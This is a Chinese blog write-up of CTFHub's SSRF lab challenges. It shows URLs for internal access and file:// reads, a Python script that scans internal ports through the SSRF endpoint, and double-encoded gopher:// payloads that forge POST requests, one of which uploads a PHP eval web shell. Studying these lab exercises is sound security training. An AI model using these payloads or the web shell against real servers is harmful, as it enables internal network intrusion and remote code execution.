CTFHUB---SSRF

SSRF是什么?
SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。

 

1.内网访问

构造url

http://challenge-4d3d62136e2a8980.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php

 

2.伪协议读取文件

http://challenge-3ccdfc8b22d98eb3.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php

页面源码

 

3.端口扫描

import requests
try:
    for i in range(8000,9001):
        url='http://challenge-c383792e4e5d3cbe.sandbox.ctfhub.com:10800/?url=127.0.0.1:'+str(i)
        data=requests.get(url).text
        if 'ctfhub' in data:
            print(data)
        else:
            pass
except:
    print('cuo')

python 端口扫描.py

 

4.POST请求

POST /flag.php HTTP/1.1Host: 127.0.0.1:80Content-Length: 36Content-Type: application/x-www-form-urlencodedkey=583ee4e219514f2541cacb39d9d9c20d

两次url编码

http://challenge-f042963869e9d0d9.sandbox.ctfhub.com:10800/?

 

 

url=gopher%3A//127.0.0.1%3A80/_%250D%250A

 

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250A

 

key%253Defb8a28f7d870d70c2cdd0d9a1e4eacf

 

http://challenge-f042963869e9d0d9.sandbox.ctfhub.com:10800/?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253Defb8a28f7d870d70c2cdd0d9a1e4eacf

 速度有点慢

 

5.上传文件

有问题

GET /?url=_ HTTP/1.1
Host: challenge-670abe4f4308b949.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

 


POST%2520%252Fflag.php%2520HTTP%252F1.1%250AHost%253A%2520challenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520WOW64%253B%2520rv%253A52.0)%2520Gecko%252F20100101%2520Firefox%252F52.0%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250AReferer%253A%2520http%253A%252F%252Fchallenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250ADNT%253A%25201%250AConnection%253A%2520close%250AUpgrade-Insecure-Requests%253A%25201%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------541164717975%250AContent-Length%253A%2520330%250A%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250AContent-Type%253A%2520application%252Foctet-stream%250A%250A%253C%253Fphp%2520%2540eval(%2524_POST%255B'123'%255D)%253B%253F%253E%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250A%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250A-----------------------------541164717975--%250A

 

GET /?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250AHost%253A%2520challenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520WOW64%253B%2520rv%253A52.0)%2520Gecko%252F20100101%2520Firefox%252F52.0%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250AReferer%253A%2520http%253A%252F%252Fchallenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250ADNT%253A%25201%250AConnection%253A%2520close%250AUpgrade-Insecure-Requests%253A%25201%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------541164717975%250AContent-Length%253A%2520330%250A%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250AContent-Type%253A%2520application%252Foctet-stream%250A%250A%253C%253Fphp%2520%2540eval(%2524_POST%255B'123'%255D)%253B%253F%253E%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250A%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250A-----------------------------541164717975--%250A

Host: challenge-670abe4f4308b949.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

 

6.FastCGI协议

 


__EOF__

本文作者TinKode
本文链接https://www.cnblogs.com/TinKode123/p/16150258.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   TinKode  阅读(253)  评论(0编辑  收藏  举报
相关博文:
·  SSRF-介绍
·  CSRF-介绍
·  ctfhub web技能树 SSRF(部分)
·  SSRF - ctfhub - 1【内网访问、伪协议读取、端口扫描、POST详解、上传文件】
·  ctfshow-SSRF
阅读排行:
· 使用C#创建一个MCP客户端
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· ollama系列1:轻松3步本地部署deepseek,普通电脑可用
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 按钮权限的设计及实现
  1. 1 少年 梦然
  2. 2 尘埃 林小柯
  3. 3 飞鸟和禅 任然
  4. 4 Dancing With Your Ghost Sasha Sloan
  5. 5 烟火人间 添儿呗
  6. 6 摘仙 伊格赛听、叶里
Dancing With Your Ghost - Sasha Sloan
00:00 / 00:00
An audio error has occurred, player will skip forward in 2 seconds.
点击右上角即可分享
微信分享提示
AI IDE Trae